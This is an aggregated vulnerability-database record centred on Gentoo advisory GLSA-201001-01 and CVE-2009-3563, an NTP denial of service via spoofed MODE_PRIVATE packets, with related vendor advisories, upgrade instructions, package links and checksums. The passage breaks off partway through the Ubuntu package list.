ID GLSA-201001-01 Type gentoo Reporter Gentoo Foundation Modified 2010-01-03T00:00:00
Description
Background
NTP is a set of the Network Time Protocol programs.
Description
Robin Park and Dmitri Vinokurov discovered that ntp_request.c in ntpd does not handle MODE_PRIVATE packets correctly, causing a continuous exchange of MODE_PRIVATE error responses between two NTP daemons or causing high CPU load on a single host.
Impact
A remote, unauthenticated attacker could send a specially crafted MODE_PRIVATE packet, allowing for a Denial of Service condition (CPU and bandwidth consumption).
Workaround
There is no known workaround at this time.
Resolution
All NTP users should upgrade to the latest version:
{"published": "2010-01-03T00:00:00", "id": "GLSA-201001-01", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}, "enchantments": {"score": {"value": 6.0, "vector": "NONE", "modified": "2016-09-06T19:46:18", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3563"]}, {"type": "f5", "idList": ["SOL10905"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:23182", "SECURITYVULNS:DOC:22897", "SECURITYVULNS:VULN:10458"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1992-1:6C7E3", "DEBIAN:DSA-1948-1:EA724"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2009-1648.NASL", "SLACKWARE_SSA_2009-343-01.NASL", "HPUX_PHNE_41908.NASL", "UBUNTU_USN-867-1.NASL", "SUSE_XNTP-6718.NASL", "AIX_IZ68659.NASL", "HPUX_PHNE_41907.NASL", "ORACLEVM_OVMSA-2009-0036.NASL", "NTPD_MODE7_PING_PONG_DOS.NASL", "AIX_IZ71614.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310100399", "OPENVAS:136141256231066527", "OPENVAS:66639", "OPENVAS:66472", "OPENVAS:66662", "OPENVAS:66519", "OPENVAS:136141256231066515", "OPENVAS:880810", "OPENVAS:100399", "OPENVAS:136141256231066501"]}, {"type": "centos", "idList": ["CESA-2009:1648", "CESA-2009:1651"]}, {"type": "redhat", "idList": ["RHSA-2009:1651", "RHSA-2009:1648"]}, {"type": "slackware", "idList": ["SSA-2009-343-01"]}, {"type": "ubuntu", "idList": ["USN-867-1"]}, {"type": "cisco", "idList": ["CISCO-SA-20091208-CVE-2009-3563"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/DOS/NTP/NTPD_RESERVED_DOS"]}, {"type": "cert", "idList": ["VU:568372"]}, {"type": "seebug", "idList": ["SSV:15050"]}, {"type": "oraclelinux", "idList": ["ELSA-2009-1648", "ELSA-2009-1651"]}], "modified": "2016-09-06T19:46:18", "rev": 2}, "vulnersScore": 6.0}, "description": "### Background\n\nNTP is a set of the Network Time Protocol programs. \n\n### Description\n\nRobin Park and Dmitri Vinokurov discovered that ntp_request.c in ntpd does not handle MODE_PRIVATE packets correctly, causing a continuous exchange of MODE_PRIVATE error responses between two NTP daemons or causing high CPU load on a single host. \n\n### Impact\n\nA remote, unauthenticated attacker could send a specially crafted MODE_PRIVATE packet, allowing for a Denial of Service condition (CPU and bandwidth consumption). \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll NTP users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/ntp-4.2.4_p7-r1\"", "type": "gentoo", "lastseen": "2016-09-06T19:46:18", "edition": 1, "title": "NTP: Denial of Service", "href": "https://security.gentoo.org/glsa/201001-01", "modified": "2010-01-03T00:00:00", "bulletinFamily": "unix", "viewCount": 2, "cvelist": ["CVE-2009-3563"], "affectedPackage": [{"packageVersion": "4.2.4_p7-r1", "packageName": "net-misc/ntp", "packageFilename": "UNKNOWN", "operator": "lt", "OSVersion": "any", "OS": "Gentoo", "arch": "all"}], "references": ["https://bugs.gentoo.org/show_bug.cgi?id=290881", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563"], "reporter": "Gentoo Foundation", "immutableFields": []}
{"cve": [{"lastseen": "2021-02-02T05:40:06", "description": "ntp_request.c in ntpd in NTP before 4.2.4p8, and 4.2.5, allows remote attackers to cause a denial of service (CPU and bandwidth consumption) by using MODE_PRIVATE to send a spoofed (1) request or (2) response packet that triggers a continuous exchange of MODE_PRIVATE error responses between two NTP daemons.", "edition": 6, "cvss3": {}, "published": "2009-12-09T18:30:00", "title": "CVE-2009-3563", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3563"], "modified": "2017-09-19T01:29:00", "cpe": ["cpe:/a:ntp:ntp:4.2.2p1", "cpe:/a:ntp:ntp:4.0.93", "cpe:/a:ntp:ntp:4.2.2p2", "cpe:/a:ntp:ntp:4.2.2p4", "cpe:/a:ntp:ntp:4.0.90", "cpe:/a:ntp:ntp:4.0.98", "cpe:/a:ntp:ntp:4.0.72", "cpe:/a:ntp:ntp:4.2.0", "cpe:/a:ntp:ntp:4.0.95", "cpe:/a:ntp:ntp:4.1.0", "cpe:/a:ntp:ntp:4.0.97", "cpe:/a:ntp:ntp:4.2.2p3", "cpe:/a:ntp:ntp:4.0.99", "cpe:/a:ntp:ntp:4.0.92", "cpe:/a:ntp:ntp:4.0.73", "cpe:/a:ntp:ntp:4.0.91", "cpe:/a:ntp:ntp:4.2.5", "cpe:/a:ntp:ntp:4.0.94", "cpe:/a:ntp:ntp:4.1.2", "cpe:/a:ntp:ntp:4.0.96", "cpe:/a:ntp:ntp:4.2.2"], "id": "CVE-2009-3563", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3563", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ntp:ntp:4.2.2p4:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.0.96:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.0.91:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.2p2:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.0.73:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.0.97:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.0.93:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.0.99:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.0.92:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.2p3:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.0.95:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.0.98:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.0.72:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.2.2p1:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.0.94:*:*:*:*:*:*:*", "cpe:2.3:a:ntp:ntp:4.0.90:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2016-09-26T17:22:59", "bulletinFamily": "software", "cvelist": ["CVE-2009-3563"], "edition": 1, "description": "*F5 Product Development has determined that these BIG-IP and Enterprise Manager versions use a vulnerable version of NTP. However, the vulnerable code is not used by default on these BIG-IP or Enterprise Manager systems. These products are only vulnerable if NTP was manually configured and enabled to be an update server.\n\n**Vulnerability description**\n\nAn **ntpd** vulnerability in NTP allows a remote attacker to cause a denial of service (DOS).\n\nInformation about this advisory is available at the following location:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563>\n\nF5 Development tracked this issue as ID 241719 (Formerly CR131466) and it was fixed in BIG-IP 10.2.0. For information about upgrading, refer to the BIG-IP LTM, ASM, GTM, Link Controller, PSM, WebAccelerator, APM, WOM, or Edge Gateway release notes. \n \n\n", "modified": "2013-07-05T00:00:00", "published": "2010-01-04T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/10000/900/sol10905.html", "id": "SOL10905", "type": "f5", "title": "SOL10905 - NTP vulnerability - CVE-2009-3563", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2020-10-25T16:35:57", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3563"], "description": "New ntp packages are available for Slackware 8.1, 9.0, 9.1, 10.0, 10.1, 10.2,\n11.0, 12.0, 12.1, 12.2, 13.0, and -current to fix a security issue. If a\nspoofed mode 7 packet is sent to a vulnerable NTP daemon it may cause CPU\nand/or disk space exhaustion, resulting in a denial of service.\n\nMore details about this issue may be found in the Common\nVulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563\n\n\nHere are the details from the Slackware 13.0 ChangeLog:\n\npatches/packages/ntp-4.2.4p8-i486-1_slack13.0.txz: Upgraded.\n Prevent a denial-of-service attack involving spoofed mode 7 packets.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3563\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\ndirectly from ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 8.1:\nftp://ftp.slackware.com/pub/slackware/slackware-8.1/patches/packages/ntp-4.2.2p3-i386-2_slack8.1.tgz\n\nUpdated package for Slackware 9.0:\nftp://ftp.slackware.com/pub/slackware/slackware-9.0/patches/packages/ntp-4.2.2p3-i386-2_slack9.0.tgz\n\nUpdated package for Slackware 9.1:\nftp://ftp.slackware.com/pub/slackware/slackware-9.1/patches/packages/ntp-4.2.2p3-i486-2_slack9.1.tgz\n\nUpdated package for Slackware 10.0:\nftp://ftp.slackware.com/pub/slackware/slackware-10.0/patches/packages/ntp-4.2.2p3-i486-2_slack10.0.tgz\n\nUpdated package for Slackware 10.1:\nftp://ftp.slackware.com/pub/slackware/slackware-10.1/patches/packages/ntp-4.2.2p3-i486-2_slack10.1.tgz\n\nUpdated package for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/ntp-4.2.2p3-i486-2_slack10.2.tgz\n\nUpdated package for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/ntp-4.2.2p3-i486-3_slack11.0.tgz\n\nUpdated package for Slackware 12.0:\nftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/ntp-4.2.4p8-i486-1_slack12.0.tgz\n\nUpdated package for Slackware 12.1:\nftp://ftp.slackware.com/pub/slackware/slackware-12.1/patches/packages/ntp-4.2.4p8-i486-1_slack12.1.tgz\n\nUpdated package for Slackware 12.2:\nftp://ftp.slackware.com/pub/slackware/slackware-12.2/patches/packages/ntp-4.2.4p8-i486-1_slack12.2.tgz\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.4p8-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.4p8-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.4p8-i486-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.4p8-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 8.1 package:\ncf159af385eff1f3e7ee97dd31181a50 ntp-4.2.2p3-i386-2_slack8.1.tgz\n\nSlackware 9.0 package:\n281891ce933cc51b4da7c4856c2e9a7a ntp-4.2.2p3-i386-2_slack9.0.tgz\n\nSlackware 9.1 package:\n8ba51d005758c1d42db139730e9552ab ntp-4.2.2p3-i486-2_slack9.1.tgz\n\nSlackware 10.0 package:\nd4494f109da2f947515bf8ca40db2e6b ntp-4.2.2p3-i486-2_slack10.0.tgz\n\nSlackware 10.1 package:\n3ed65c1bda71156978424de0f13436f9 ntp-4.2.2p3-i486-2_slack10.1.tgz\n\nSlackware 10.2 package:\n345eced7dc1135943f119c8ae066fbde ntp-4.2.2p3-i486-2_slack10.2.tgz\n\nSlackware 11.0 package:\ne5fbcad45bb274ebee2c6c11b0c18a73 ntp-4.2.2p3-i486-3_slack11.0.tgz\n\nSlackware 12.0 package:\nd367da8f356c71ee915957280fe731b2 ntp-4.2.4p8-i486-1_slack12.0.tgz\n\nSlackware 12.1 package:\n3632138b29c2f73f027be03b220da30c ntp-4.2.4p8-i486-1_slack12.1.tgz\n\nSlackware 12.2 package:\n450f8b3cdf63cc61ea6d2baa9c9ebb00 ntp-4.2.4p8-i486-1_slack12.2.tgz\n\nSlackware 13.0 package:\naf0c7662fb258ffd6f34f4ca68ee6553 ntp-4.2.4p8-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n77dfe4dfe7f35e02e9cd455b0d82e79f ntp-4.2.4p8-x86_64-1_slack13.0.txz\n\nSlackware -current package:\n22f81c7c0856aa55846323f9376dbdbf ntp-4.2.4p8-i486-1.txz\n\nSlackware x86_64 -current package:\n1d6562a98631f5f8601f696a7b4d7ed7 ntp-4.2.4p8-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ntp-4.2.4p8-i486-1_slack13.0.txz\n\nThen, restart ntpd.", "modified": "2009-12-10T08:39:43", "published": "2009-12-10T08:39:43", "id": "SSA-2009-343-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2009&m=slackware-security.578593", "type": "slackware", "title": "[slackware-security] ntp", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:24:40", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3563"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1648\n\n\nThe Network Time Protocol (NTP) is used to synchronize a computer's time\nwith a referenced time source.\n\nRobin Park and Dmitri Vinokurov discovered a flaw in the way ntpd handled\ncertain malformed NTP packets. ntpd logged information about all such\npackets and replied with an NTP packet that was treated as malformed when\nreceived by another ntpd. A remote attacker could use this flaw to create\nan NTP packet reply loop between two ntpd servers via a malformed packet\nwith a spoofed source IP address and port, causing ntpd on those servers to\nuse excessive amounts of CPU time and fill disk space with log messages.\n(CVE-2009-3563)\n\nAll ntp users are advised to upgrade to this updated package, which\ncontains a backported patch to resolve this issue. After installing the\nupdate, the ntpd daemon will restart automatically.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-December/028394.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-December/028395.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-December/028398.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-December/028399.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-December/028443.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-December/028444.html\n\n**Affected packages:**\nntp\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1648.html", "edition": 3, "modified": "2009-12-19T12:03:08", "published": "2009-12-08T22:33:14", "href": "http://lists.centos.org/pipermail/centos-announce/2009-December/028394.html", "id": "CESA-2009:1648", "title": "ntp security update", "type": "centos", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-12-20T18:26:42", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3563", "CVE-2009-0159"], "description": "**CentOS Errata and Security Advisory** CESA-2009:1651\n\n\nThe Network Time Protocol (NTP) is used to synchronize a computer's time\nwith a referenced time source.\n\nRobin Park and Dmitri Vinokurov discovered a flaw in the way ntpd handled\ncertain malformed NTP packets. ntpd logged information about all such\npackets and replied with an NTP packet that was treated as malformed when\nreceived by another ntpd. A remote attacker could use this flaw to create\nan NTP packet reply loop between two ntpd servers via a malformed packet\nwith a spoofed source IP address and port, causing ntpd on those servers to\nuse excessive amounts of CPU time and fill disk space with log messages.\n(CVE-2009-3563)\n\nA buffer overflow flaw was found in the ntpq diagnostic command. A\nmalicious, remote server could send a specially-crafted reply to an ntpq\nrequest that could crash ntpq or, potentially, execute arbitrary code with\nthe privileges of the user running the ntpq command. (CVE-2009-0159)\n\nAll ntp users are advised to upgrade to this updated package, which\ncontains backported patches to resolve these issues. After installing the\nupdate, the ntpd daemon will restart automatically.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2009-December/028390.html\nhttp://lists.centos.org/pipermail/centos-announce/2009-December/028391.html\n\n**Affected packages:**\nntp\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2009-1651.html", "edition": 3, "modified": "2009-12-08T22:18:20", "published": "2009-12-08T22:18:02", "href": "http://lists.centos.org/pipermail/centos-announce/2009-December/028390.html", "id": "CESA-2009:1651", "title": "ntp security update", "type": "centos", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2019-08-13T18:46:41", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3563"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time\nwith a referenced time source.\n\nRobin Park and Dmitri Vinokurov discovered a flaw in the way ntpd handled\ncertain malformed NTP packets. ntpd logged information about all such\npackets and replied with an NTP packet that was treated as malformed when\nreceived by another ntpd. A remote attacker could use this flaw to create\nan NTP packet reply loop between two ntpd servers via a malformed packet\nwith a spoofed source IP address and port, causing ntpd on those servers to\nuse excessive amounts of CPU time and fill disk space with log messages.\n(CVE-2009-3563)\n\nAll ntp users are advised to upgrade to this updated package, which\ncontains a backported patch to resolve this issue. After installing the\nupdate, the ntpd daemon will restart automatically.", "modified": "2017-09-08T12:13:31", "published": "2009-12-08T05:00:00", "id": "RHSA-2009:1648", "href": "https://access.redhat.com/errata/RHSA-2009:1648", "type": "redhat", "title": "(RHSA-2009:1648) Moderate: ntp security update", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-05-29T14:35:44", "bulletinFamily": "unix", "cvelist": ["CVE-2009-0159", "CVE-2009-3563"], "description": "The Network Time Protocol (NTP) is used to synchronize a computer's time\nwith a referenced time source.\n\nRobin Park and Dmitri Vinokurov discovered a flaw in the way ntpd handled\ncertain malformed NTP packets. ntpd logged information about all such\npackets and replied with an NTP packet that was treated as malformed when\nreceived by another ntpd. A remote attacker could use this flaw to create\nan NTP packet reply loop between two ntpd servers via a malformed packet\nwith a spoofed source IP address and port, causing ntpd on those servers to\nuse excessive amounts of CPU time and fill disk space with log messages.\n(CVE-2009-3563)\n\nA buffer overflow flaw was found in the ntpq diagnostic command. A\nmalicious, remote server could send a specially-crafted reply to an ntpq\nrequest that could crash ntpq or, potentially, execute arbitrary code with\nthe privileges of the user running the ntpq command. (CVE-2009-0159)\n\nAll ntp users are advised to upgrade to this updated package, which\ncontains backported patches to resolve these issues. After installing the\nupdate, the ntpd daemon will restart automatically.", "modified": "2018-05-26T04:26:18", "published": "2009-12-08T05:00:00", "id": "RHSA-2009:1651", "href": "https://access.redhat.com/errata/RHSA-2009:1651", "type": "redhat", "title": "(RHSA-2009:1651) Moderate: ntp security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:34", "bulletinFamily": "software", "cvelist": ["CVE-2009-3563"], "description": "NTP packet from the spoofed address of server itself causes resources exhaustion.", "edition": 1, "modified": "2009-12-09T00:00:00", "published": "2009-12-09T00:00:00", "id": "SECURITYVULNS:VULN:10458", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10458", "title": "ntp server DoS", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "bulletinFamily": "software", "cvelist": ["CVE-2009-3563"], "description": "===========================================================\r\nUbuntu Security Notice USN-867-1 December 08, 2009\r\nntp vulnerability\r\nCVE-2009-3563\r\n===========================================================\r\n\r\nA security issue affects the following Ubuntu releases:\r\n\r\nUbuntu 6.06 LTS\r\nUbuntu 8.04 LTS\r\nUbuntu 8.10\r\nUbuntu 9.04\r\nUbuntu 9.10\r\n\r\nThis advisory also applies to the corresponding versions of\r\nKubuntu, Edubuntu, and Xubuntu.\r\n\r\nThe problem can be corrected by upgrading your system to the\r\nfollowing package versions:\r\n\r\nUbuntu 6.06 LTS:\r\n ntp 1:4.2.0a+stable-8.1ubuntu6.3\r\n ntp-server 1:4.2.0a+stable-8.1ubuntu6.3\r\n\r\nUbuntu 8.04 LTS:\r\n ntp 1:4.2.4p4+dfsg-3ubuntu2.3\r\n\r\nUbuntu 8.10:\r\n ntp 1:4.2.4p4+dfsg-6ubuntu2.4\r\n\r\nUbuntu 9.04:\r\n ntp 1:4.2.4p4+dfsg-7ubuntu5.2\r\n\r\nUbuntu 9.10:\r\n ntp 1:4.2.4p6+dfsg-1ubuntu5.1\r\n\r\nIn general, a standard system upgrade is sufficient to effect the\r\nnecessary changes.\r\n\r\nDetails follow:\r\n\r\nRobin Park and Dmitri Vinokurov discovered a logic error in ntpd. A remote\r\nattacker could send a crafted NTP mode 7 packet with a spoofed IP address\r\nof an affected server and cause a denial of service via CPU and disk\r\nresource consumption.\r\n\r\n\r\nUpdated packages for Ubuntu 6.06 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.0a+stable-8.1ubuntu6.3.diff.gz\r\n Size/MD5: 262833 1fdb567debfe1ce10ffc44ec492d4aa5\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.0a+stable-8.1ubuntu6.3.dsc\r\n Size/MD5: 872 a6f59fefbf4050684aa38de8b24c54b3\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.0a+stable.orig.tar.gz\r\n Size/MD5: 2272395 30f8b3d5b970c14dce5c6d8c922afa3e\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-doc_4.2.0a+stable-8.1ubuntu6.3_all.deb\r\n Size/MD5: 891204 35969710cca05eabef8399e53de0bdb5\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-server_4.2.0a+stable-8.1ubuntu6.3_amd64.deb\r\n Size/MD5: 35022 cf299ac36cb52399b7b80a7aa6b00c77\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-simple_4.2.0a+stable-8.1ubuntu6.3_amd64.deb\r\n Size/MD5: 136402 14d2d9f6ec9a8f4edb2d674538b642a8\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.0a+stable-8.1ubuntu6.3_amd64.deb\r\n Size/MD5: 270524 05dfaa4fdf895ebfdf61ee43d97ef9c6\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntpdate_4.2.0a+stable-8.1ubuntu6.3_amd64.deb\r\n Size/MD5: 47932 ee2a72cdc8d20e545443bbcf086c6f82\r\n http://security.ubuntu.com/ubuntu/pool/universe/n/ntp/ntp-refclock_4.2.0a+stable-8.1ubuntu6.3_amd64.deb\r\n Size/MD5: 224268 d9daac981b2dd6d16d69d4bfc0f1d4bf\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-server_4.2.0a+stable-8.1ubuntu6.3_i386.deb\r\n Size/MD5: 33926 4a79ecdb4d1fa3d407fca23c00292a9d\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-simple_4.2.0a+stable-8.1ubuntu6.3_i386.deb\r\n Size/MD5: 121710 77db2cb6c9daa84d6174fbe277a96c44\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.0a+stable-8.1ubuntu6.3_i386.deb\r\n Size/MD5: 256764 7aeb8e664a3ff16608fc880a108a8645\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntpdate_4.2.0a+stable-8.1ubuntu6.3_i386.deb\r\n Size/MD5: 44598 1e3067b9f7fee43a3f0b18ec9d4b356b\r\n http://security.ubuntu.com/ubuntu/pool/universe/n/ntp/ntp-refclock_4.2.0a+stable-8.1ubuntu6.3_i386.deb\r\n Size/MD5: 198516 a0066ee286571189f7f6099bd8a2c220\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-server_4.2.0a+stable-8.1ubuntu6.3_powerpc.deb\r\n Size/MD5: 37162 3b19f883b00809d36ae9bd79114955c1\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-simple_4.2.0a+stable-8.1ubuntu6.3_powerpc.deb\r\n Size/MD5: 135184 d1419b2d9aff1392c78bab2911114c2a\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.0a+stable-8.1ubuntu6.3_powerpc.deb\r\n Size/MD5: 271468 856ffca2e1d79bfd730aec3bcc1ce497\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntpdate_4.2.0a+stable-8.1ubuntu6.3_powerpc.deb\r\n Size/MD5: 49266 2cee0d14d9d1deafb78b26041d1ed05a\r\n http://security.ubuntu.com/ubuntu/pool/universe/n/ntp/ntp-refclock_4.2.0a+stable-8.1ubuntu6.3_powerpc.deb\r\n Size/MD5: 222168 42ef5dfaddb9e1fe9b9933119cdbe9ab\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-server_4.2.0a+stable-8.1ubuntu6.3_sparc.deb\r\n Size/MD5: 34428 09539a35a435d11f12ed9f5bd9534771\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-simple_4.2.0a+stable-8.1ubuntu6.3_sparc.deb\r\n Size/MD5: 126814 8e2066b695d32e08355bfdc0f571c705\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.0a+stable-8.1ubuntu6.3_sparc.deb\r\n Size/MD5: 261652 1e4142216eb7ff527ce1f59b2ad2d0af\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntpdate_4.2.0a+stable-8.1ubuntu6.3_sparc.deb\r\n Size/MD5: 46790 7d456f67bea9e6c3f2452a5d6a847f67\r\n http://security.ubuntu.com/ubuntu/pool/universe/n/ntp/ntp-refclock_4.2.0a+stable-8.1ubuntu6.3_sparc.deb\r\n Size/MD5: 207566 433dca719ea61cca73b993a530299fae\r\n\r\nUpdated packages for Ubuntu 8.04 LTS:\r\n\r\n Source archives:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p4+dfsg-3ubuntu2.3.diff.gz\r\n Size/MD5: 287172 dfb60aa2cd60f61907856f5b50c8fc46\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p4+dfsg-3ubuntu2.3.dsc\r\n Size/MD5: 1046 251a7ead6fcf835535176b89ed7cc3d4\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p4+dfsg.orig.tar.gz\r\n Size/MD5: 2835029 dc2b3ac9cc04b0f29df35467514c9884\r\n\r\n Architecture independent packages:\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp-doc_4.2.4p4+dfsg-3ubuntu2.3_all.deb\r\n Size/MD5: 928116 28eb96c89717c9fdfe39b3f140428484\r\n\r\n amd64 architecture (Athlon64, Opteron, EM64T Xeon):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p4+dfsg-3ubuntu2.3_amd64.deb\r\n Size/MD5: 477388 bc91b335e5963954d4284d0b57b37c40\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntpdate_4.2.4p4+dfsg-3ubuntu2.3_amd64.deb\r\n Size/MD5: 65194 185195f8e2df78f7dfbba5b88be482ce\r\n\r\n i386 architecture (x86 compatible Intel/AMD):\r\n\r\n http://security.ubuntu.com/ubuntu/pool/main/n/ntp/ntp_4.2.4p4+dfsg-3ubuntu2.3_i386.deb\r\n Size/MD5: 432592 0ec673d7b4507cb992091a7b63007826\r\n 